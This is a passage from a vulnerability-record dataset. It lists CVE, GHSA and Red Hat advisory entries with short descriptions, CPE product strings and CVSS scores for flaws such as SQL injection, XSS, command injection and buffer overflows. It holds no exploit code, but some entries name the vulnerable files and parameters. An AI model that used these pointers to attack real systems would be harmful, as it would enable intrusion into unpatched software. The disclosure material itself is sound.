"cpe:2.3:a:php:php:4.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:4.4.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.13:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.14:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.15:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.16:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.2.17:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.9:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.10:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.11:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.12:*:*:*:*:*:*:*", "cpe:2.3:a:php:php:5.3.13:*:*:*:*:*:*:*" ]
null
null
null
5
CVE-2008-6156
SQL injection vulnerability in editCampaign.php in AdMan 1.1.20070907 allows remote authenticated users to execute arbitrary SQL commands via the campaignId parameter.
[ "cpe:2.3:a:formfields:adman:1.1.20070907:*:*:*:*:*:*:*" ]
null
null
null
6.5
CVE-2022-33945
Improper input validation in some Intel(R) Server board and Intel(R) Server System BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.
[ "cpe:2.3:o:intel:server_m20ntp_family:*:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_system_m70klp_family:*:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_board_m10jnp2sb_family:*:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_board_s2600bp_family:*:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_board_m70klp2sb_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_board_m70klp2sb:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_system_m70klp4s2uhh_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_system_m70klp4s2uhh:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_board_m20ntp2sb_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_board_m20ntp2sb:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_system_m20ntp1ur304_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_system_m20ntp1ur304:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_board_m10jnp2sb_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_board_m10jnp2sb:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_board_s2600bpbr_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_board_s2600bpbr:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_board_s2600bps_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_board_s2600bps:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_board_s2600bpsr_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_board_s2600bpsr:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_board_s2600bpqr_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_board_s2600bpqr:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_board_s2600bpb_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_board_s2600bpb:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_board_s2600bpq_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_board_s2600bpq:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bpblcr_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bpblcr:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bpblc_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bpblc:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bpblc24r_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bpblc24r:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bps_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bps:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bps24_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bps24:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bpbr_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bpbr:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bpqr_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bpqr:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bpsr_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bpsr:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bps24r_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bps24r:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bpq24r_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bpq24r:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bpb24_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bpb24:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bpb_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bpb:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bpblc24_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bpblc24:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bpq_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bpq:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_hns2600bpq24_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_hns2600bpq24:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:compute_module_liquid-cooled_hns2600bpbrct_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:compute_module_liquid-cooled_hns2600bpbrct:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_system_vrn2224bpaf6_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_system_vrn2224bpaf6:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_system_vrn2224bphy6_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_system_vrn2224bphy6:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_system_mcb2208wfaf5_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_system_mcb2208wfaf5:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_system_zsb2224bpaf2_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_system_zsb2224bpaf2:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_system_zsb2224bphy1_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_system_zsb2224bphy1:-:*:*:*:*:*:*:*", "cpe:2.3:o:intel:server_system_zsb2224bpaf1_firmware:*:*:*:*:*:*:*:*", "cpe:2.3:h:intel:server_system_zsb2224bpaf1:-:*:*:*:*:*:*:*" ]
null
8.2
null
null
CVE-2015-8571
Integer overflow in Autodesk Design Review (ADR) before 2013 Hotfix 2 allows remote attackers to execute arbitrary code via a crafted biClrUsed value in a BMP file, which triggers a buffer overflow.
[ "cpe:2.3:a:autodesk:design_review:2013:*:*:*:*:*:*:*" ]
null
null
null
6.8
CVE-2024-44178
This issue was addressed with improved validation of symlinks. This issue is fixed in macOS Ventura 13.7, macOS Sonoma 14.7, macOS Sequoia 15. An app may be able to modify protected parts of the file system.
[ "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*" ]
null
5.5
null
null
GHSA-396g-xc2g-5qhm
Vulnerability in Tenda AC8v4 .V16.03.34.09 due to sscanf and the last digit of s8 being overwritten with \x0. After executing set_client_qos, control over the gp register can be obtained.
[]
null
6.3
null
null
GHSA-c587-35qx-9wwg
A vulnerability classified as critical has been found in LB-LINK BL-AC3600 up to 1.0.22. This affects the function easy_uci_set_option_string_0 of the file /cgi-bin/lighttpd.cgi of the component Password Handler. The manipulation of the argument routepwd leads to command injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
[]
5.3
6.3
null
null
GHSA-837m-69vg-m44j
SQL injection vulnerability in admin/utilities_ConfigHelp.asp in CandyPress (CP) 4.1.1.26, and other 4.x and 3.x versions, allows remote attackers to execute arbitrary SQL commands via the helpfield parameter.
[]
null
null
null
null
CVE-2006-0981
Directory traversal vulnerability in e-merge WinAce 2.6 and earlier allows remote attackers to create and overwrite arbitrary files via certain crafted pathnames in a (1) zip or (2) tar archive.
[ "cpe:2.3:a:e-merge:e-merge_winace:2.6:*:*:*:*:*:*:*" ]
null
null
null
4
CVE-2017-3381
Vulnerability in the Oracle Advanced Outbound Telephony component of Oracle E-Business Suite (subcomponent: User Interface). Supported versions that are affected are 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, 12.2.5 and 12.2.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Advanced Outbound Telephony. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Advanced Outbound Telephony, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Advanced Outbound Telephony accessible data as well as unauthorized update, insert or delete access to some of Oracle Advanced Outbound Telephony accessible data. CVSS v3.0 Base Score 8.2 (Confidentiality and Integrity impacts).
[ "cpe:2.3:a:oracle:advanced_outbound_telephony:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:advanced_outbound_telephony:12.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:advanced_outbound_telephony:12.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:advanced_outbound_telephony:12.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:advanced_outbound_telephony:12.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:advanced_outbound_telephony:12.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:advanced_outbound_telephony:12.2.6:*:*:*:*:*:*:*" ]
null
null
8.2
5.8
GHSA-wv39-gr2w-7565
** DISPUTED ** GMXRC.bash in Gromacs 4.5.1 and earlier places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse shared library in the current working directory. NOTE: CVE disputes this issue because the GMXLDLIB value is always added to the beginning of LD_LIBRARY_PATH at a later point in the script.
[]
null
null
null
null
CVE-2023-26439
The cacheservice API could be abused to inject parameters with SQL syntax which was insufficiently sanitized before getting executed as SQL statement. Attackers with access to a local or restricted network were able to perform arbitrary SQL queries, discovering other users cached data. We have improved the input check for API calls and filter for potentially malicious content. No publicly available exploits are known.
[ "cpe:2.3:a:open-xchange:open-xchange_appsuite_office:*:*:*:*:*:*:*:*" ]
null
7.6
null
null
CVE-2010-2676
Multiple directory traversal vulnerabilities in index.php in Open Web Analytics (OWA) 1.2.3 might allow remote attackers to read arbitrary files via directory traversal sequences in the (1) owa_action and (2) owa_do parameters.
[ "cpe:2.3:a:openwebanalytics:open_web_analytics:1.2.3:*:*:*:*:*:*:*" ]
null
null
null
5
RHBA-2025:4872
Red Hat Bug Fix Advisory: rpm-ostree bug fix and enhancement update
rpm-ostree: world-readable /etc/shadow file
[ "cpe:/o:redhat:enterprise_linux:10.0" ]
null
6.2
null
null
CVE-2018-16116
SQL injection vulnerability in AccountStatus.jsp in Admin Portal of Sophos XG firewall 17.0.8 MR-8 allow remote authenticated attackers to execute arbitrary SQL commands via the "username" GET parameter.
[ "cpe:2.3:o:sophos:sfos:17.0.8:mr8:*:*:*:*:*:*", "cpe:2.3:h:sophos:xg_firewall:-:*:*:*:*:*:*:*" ]
null
null
8.8
6.5
GHSA-5gvh-r52j-mgx6
Unspecified vulnerability in Oracle MySQL 5.6.27 and earlier and 5.7.9 allows remote authenticated users to affect availability via vectors related to DML, a different vulnerability than CVE-2016-0504.
[]
null
null
null
null
GHSA-qwwm-8j3m-f3mj
Philips Brilliance CT software (Brilliance 64 version 2.6.2 and prior, Brilliance iCT versions 4.1.6 and prior, Brillance iCT SP versions 3.2.4 and prior, and Brilliance CT Big Bore 2.3.5 and prior) contains fixed credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. An attacker could compromise these credentials and gain access to the system.
[]
null
null
7.8
null
CVE-2022-48298
The geofencing kernel code does not verify the length of the input data. Successful exploitation of this vulnerability may cause out-of-bounds memory access.
[ "cpe:2.3:o:huawei:emui:12.0.1:*:*:*:*:*:*:*", "cpe:2.3:o:huawei:harmonyos:2.0:*:*:*:*:*:*:*", "cpe:2.3:o:huawei:harmonyos:3.0.0:*:*:*:*:*:*:*" ]
null
7.5
null
null
CVE-2014-3188
Google Chrome before 38.0.2125.101 and Chrome OS before 38.0.2125.101 do not properly handle the interaction of IPC and Google V8, which allows remote attackers to execute arbitrary code via vectors involving JSON data, related to improper parsing of an escaped index by ParseJsonObject in json-parser.h.
[ "cpe:2.3:o:google:chrome_os:*:*:*:*:*:*:*:*", "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_supplementary_eus:6.6.z:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation_supplementary:6.0:*:*:*:*:*:*:*" ]
null
null
null
10
CVE-2019-1807
Cisco Umbrella Dashboard Session Management Vulnerability
A vulnerability in the session management functionality of the web UI for the Cisco Umbrella Dashboard could allow an authenticated, remote attacker to access the Dashboard via an active, user session. The vulnerability exists due to the affected application not invalidating an existing session when a user authenticates to the application and changes the users credentials via another authenticated session. An attacker could exploit this vulnerability by using a separate, authenticated, active session to connect to the application through the web UI. A successful exploit could allow the attacker to maintain access to the dashboard via an authenticated user's browser session. Cisco has addressed this vulnerability in the Cisco Umbrella Dashboard. No user action is required.
[ "cpe:2.3:a:cisco:umbrella:*:*:*:*:*:*:*:*" ]
null
null
7.6
null
GHSA-c2j5-mf46-9fj2
NVIDIA BMC contains a vulnerability in IPMI handler, where an authorized attacker can cause a buffer overflow and cause a denial of service or gain code execution
[]
null
7.8
null
null
GHSA-hwj3-49hf-qwwh
Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Alexander Semikashev Yandex Metrica Counter plugin <= 1.4.3 versions.
[]
null
5.9
null
null
GHSA-cv9w-4qgc-5w82
A vulnerability, which was classified as problematic, has been found in otale tale up to 2.0.5. This issue affects the function OptionsService of the file src/main/resources/templates/themes/default/partial/header.html. The manipulation of the argument logo_url leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This vulnerability only affects products that are no longer supported by the maintainer.
[]
4.8
2.4
null
null
CVE-2013-6225
LiveZilla 5.0.1.4 has a Remote Code Execution vulnerability
[ "cpe:2.3:a:livezilla:livezilla:5.0.1.4:*:*:*:*:*:*:*" ]
null
9.8
null
7.5
GHSA-4f6q-pc62-pfpp
A vulnerability classified as problematic was found in LinZhaoguan pb-cms up to 2.0.1. This vulnerability affects unknown code of the file /admin#permissions of the component Permission Management Page. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
[]
5.1
2.4
null
null
GHSA-44j7-xx3x-rr9p
A vulnerability classified as critical has been found in Brilliance Golden Link Secondary System up to 20250609. This affects an unknown part of the file /storagework/custTakeInfoPage.htm. The manipulation of the argument custTradeName leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.
[]
2.1
6.3
null
null
GHSA-cc9v-j5mh-4rvx
In the Linux kernel, the following vulnerability has been resolved:arm64: dts: imx8mm-verdin: Do not power down eth-phyCurrently if suspending using either freeze or memory state, the fec driver tries to power down the phy which leads to crash of the kernel and non-responsible kernel with the following call trace:[ 24.839889 ] Call trace: [ 24.839892 ] phy_error+0x18/0x60 [ 24.839898 ] kszphy_handle_interrupt+0x6c/0x80 [ 24.839903 ] phy_interrupt+0x20/0x2c [ 24.839909 ] irq_thread_fn+0x30/0xa0 [ 24.839919 ] irq_thread+0x178/0x2c0 [ 24.839925 ] kthread+0x154/0x160 [ 24.839932 ] ret_from_fork+0x10/0x20Since there is currently no functionality in the phy subsystem to power down phys let's just disable the feature of powering-down the ethernet phy.
[]
null
null
null
null
CVE-2006-0634
Borland C++Builder 6 (BCB6) with Update Pack 4 Enterprise edition (ent_upd4) evaluates the "i>sizeof(int)" expression to false when i equals -1, which might introduce integer overflow vulnerabilities into applications that could be exploited by context-dependent attackers.
[ "cpe:2.3:a:borland_software:c\\+\\+_builder:6:enterprise_update_4:*:*:*:*:*:*" ]
null
null
null
4.6
RHSA-2023:3082
Red Hat Security Advisory: pcs security and bug fix update
rubygem-rack: Denial of service in Multipart MIME parsing rubygem-rack: denial of service in header parsing
[ "cpe:/a:redhat:enterprise_linux:8::highavailability", "cpe:/a:redhat:enterprise_linux:8::resilientstorage" ]
null
5.3
null
null
GHSA-v7qx-j3q6-rmfj
Envoy Passport for Android and Envoy Passport for iPhone could allow a local attacker to obtain sensitive information, caused by the storing of hardcoded OAuth Creds in plaintext. An attacker could exploit this vulnerability to obtain sensitive information.
[]
null
null
7.8
null
CVE-2021-0407
In clk driver, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS05479659; Issue ID: ALPS05479659.
[ "cpe:2.3:o:google:android:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:google:android:11.0:*:*:*:*:*:*:*" ]
null
6.7
null
4.6
GHSA-r2c5-h8gp-93rp
A vulnerability was found in PHPGurukul Emergency Ambulance Hiring Portal 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/search.php of the component Search Request Page. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-258684.
[]
null
2.4
null
null
GHSA-2fqm-m4r2-fh98
kiwitcms vulnerable to stored cross-site scripting via unrestricted file upload
ImpactKiwi TCMS allows users to upload attachments to test plans, test cases, etc. Earlier versions of Kiwi TCMS had introduced upload validators in order to prevent potentially dangerous files from being uploaded and Content-Security-Policy definition to prevent cross-site-scripting attacks.The upload validation checks were not 100% robust which left the possibility to circumvent them and upload a potentially dangerous file which allows execution of arbitrary JavaScript in the browser. Additionally we've discovered that Nginx's `proxy_pass` directive will strip some headers negating protections built into Kiwi TCMS when served behind a reverse proxy.PatchesImproved file upload validation codeUpdated Nginx reverse proxy configuration for ***.tenant.kiwitcms.org**WorkaroundsIf serving Kiwi TCMS behind a reverse proxy make sure that additional header values are still passed to the client browser. If they aren't redefine them inside the proxy configuration. See [etc/nginx.conf#L66-L68](https://github.com/kiwitcms/Kiwi/blob/master/etc/nginx.conf#L66-L68) and [etc/nginx.conf#L87](https://github.com/kiwitcms/Kiwi/blob/master/etc/nginx.conf#L87)ReferencesDisclosed by [M Nadeem Qazi](https://huntr.dev/bounties/6aea9a26-e29a-467b-aa5a-f767f0c2ec96/).
[]
null
8.1
null
null
CVE-2024-5335
Ultimate Store Kit Elementor Addons, Woocommerce Builder, EDD Builder, Elementor Store Builder, Product Grid, Product Table, Woocommerce Slider <= 1.6.4 - Unauthenticated PHP Object Injection
The Ultimate Store Kit Elementor Addons, Woocommerce Builder, EDD Builder, Elementor Store Builder, Product Grid, Product Table, Woocommerce Slider plugin is vulnerable to PHP Object Injection via deserialization of untrusted input via the _ultimate_store_kit_compare_products cookie in versions up to , and including, 1.6.4. This makes it possible for an unauthenticated attacker to inject a PHP Object. No POP chain is present in the vulnerable plugin. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker or above to delete arbitrary files, retrieve sensitive data, or execute code.
[]
null
9.8
null
null
GHSA-h225-hgrx-3wqv
A memory leak vulnerability was found in the function parseSWF_DOACTION in util/parser.c in Ming 0.4.8, which allows attackers to cause a denial of service via a crafted file.
[]
null
null
6.5
null
CVE-2025-3092
MB connect line: Observable response discrepancy in mbCONNECT24/mymbCONNECT24
An unauthenticated remote attacker can enumerate valid user names from an unprotected endpoint.
[]
null
7.5
null
null
RHSA-2024:2621
Red Hat Security Advisory: kernel security, bug fix, and enhancement update
kernel: ext4: kernel bug in ext4_write_inline_data_end() kernel: use after free flaw in l2cap_conn_del in net/bluetooth/l2cap_core.c kernel: Information leak in l2cap_parse_conf_req in net/bluetooth/l2cap_core.c kernel: tty: n_gsm: add sanity check for gsm->receive in gsm_receive_buf() kernel: GSM multiplexing race condition leads to privilege escalation kernel: untrusted VMM can trigger int80 syscall handling
[ "cpe:/a:redhat:rhel_eus:8.8::crb", "cpe:/o:redhat:rhel_eus:8.8::baseos" ]
null
5.6
null
null
CVE-2021-32844
HyperKit is a toolkit for embedding hypervisor capabilities in an application. In versions 0.20210107 and prior of HyperKit, ` vi_pci_write` has is a call to `vc_cfgwrite` that does not check for null which when called makes the host crash. This issue may lead to a guest crashing the host causing a denial of service. This issue is fixed in commit 451558fe8aaa8b24e02e34106e3bb9fe41d7ad13.
[ "cpe:2.3:a:mobyproject:hyperkit:*:*:*:*:*:*:*:*" ]
null
6.2
null
null
GHSA-cj4c-jmfw-fpxv
AS/400 running OS400 5.2 installs and enables LDAP by default, which allows remote authenticated users to obtain OS/400 user profiles by performing a search.
[]
null
null
null
null
GHSA-4p9r-m5q5-m33p
Improper access control for some Intel Unison software may allow a privileged user to potentially enable denial of service via local access.
[]
null
1.9
null
null
RHSA-2017:3335
Red Hat Security Advisory: Red Hat Enterprise Linux 6.2 AMC One-Month Notice
This is the one-month notification for the retirement of Red Hat Enterprise Linux 6.2 Advanced Mission Critical (AMC). This notification applies only to those customers subscribed to the Advanced Mission Critical (AMC) channel for Red Hat Enterprise Linux 6.2.
[ "cpe:/o:redhat:rhel_mission_critical:6.2::server" ]
null
null
null
null
GHSA-qh5f-x6pg-3r4j
Heap-based buffer overflow in Lhaplus.exe in Lhaplus 1.52, and possibly earlier versions, allows remote attackers to execute arbitrary code via an LZH archive with a long header, as specified by the extendedHeaderSize.
[]
null
null
null
null
CVE-2022-49709
cfi: Fix __cfi_slowpath_diag RCU usage with cpuidle
In the Linux kernel, the following vulnerability has been resolved: cfi: Fix __cfi_slowpath_diag RCU usage with cpuidle RCU_NONIDLE usage during __cfi_slowpath_diag can result in an invalid RCU state in the cpuidle code path: WARNING: CPU: 1 PID: 0 at kernel/rcu/tree.c:613 rcu_eqs_enter+0xe4/0x138 ... Call trace: rcu_eqs_enter+0xe4/0x138 rcu_idle_enter+0xa8/0x100 cpuidle_enter_state+0x154/0x3a8 cpuidle_enter+0x3c/0x58 do_idle.llvm.6590768638138871020+0x1f4/0x2ec cpu_startup_entry+0x28/0x2c secondary_start_kernel+0x1b8/0x220 __secondary_switched+0x94/0x98 Instead, call rcu_irq_enter/exit to wake up RCU only when needed and disable interrupts for the entire CFI shadow/module check when we do.
[]
null
null
null
null
GHSA-g8c4-rhfw-rcpw
Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.8.8.
[]
null
null
3.9
null
RHSA-2023:6292
Red Hat Security Advisory: curl security update
curl: IDN wildcard match may lead to Improper Cerificate Validation curl: cookie injection with none file
[ "cpe:/o:redhat:rhel_eus:8.6::baseos" ]
null
3.7
null
null
CVE-2024-57728
SimpleHelp remote support software v5.5.7 and before allows admin users to upload arbitrary files anywhere on the file system by uploading a crafted zip file (i.e. zip slip). This can be exploited to execute arbitrary code on the host in the context of the SimpleHelp server user.
[]
null
7.2
null
null
CVE-2021-34685
UploadService in Hitachi Vantara Pentaho Business Analytics through 9.1 does not properly verify uploaded user files, which allows an authenticated user to upload various files of different file types. Specifically, a .jsp file is not allowed, but a .jsp. file is allowed (and leads to remote code execution).
[ "cpe:2.3:a:hitachi:vantara_pentaho:*:*:*:*:*:*:*:*" ]
null
2.7
null
null
GHSA-xxv5-m8w5-gxh4
Jensen of Scandinavia Eagle 1200AC V15.03.06.33_en was discovered to contain a stack overflow via the wrlEn_5g parameter at /goform/WifiBasicSet.
[]
null
6.5
null
null
CVE-2008-4927
Microsoft Windows Media Player (WMP) 9.0 through 11 allows user-assisted attackers to cause a denial of service (application crash) via a malformed (1) MIDI or (2) DAT file, related to "MThd Header Parsing." NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
[ "cpe:2.3:a:microsoft:windows_media_player:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:windows_media_player:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:windows_media_player:11:*:*:*:*:*:*:*" ]
null
null
null
4.3
CVE-2022-25338
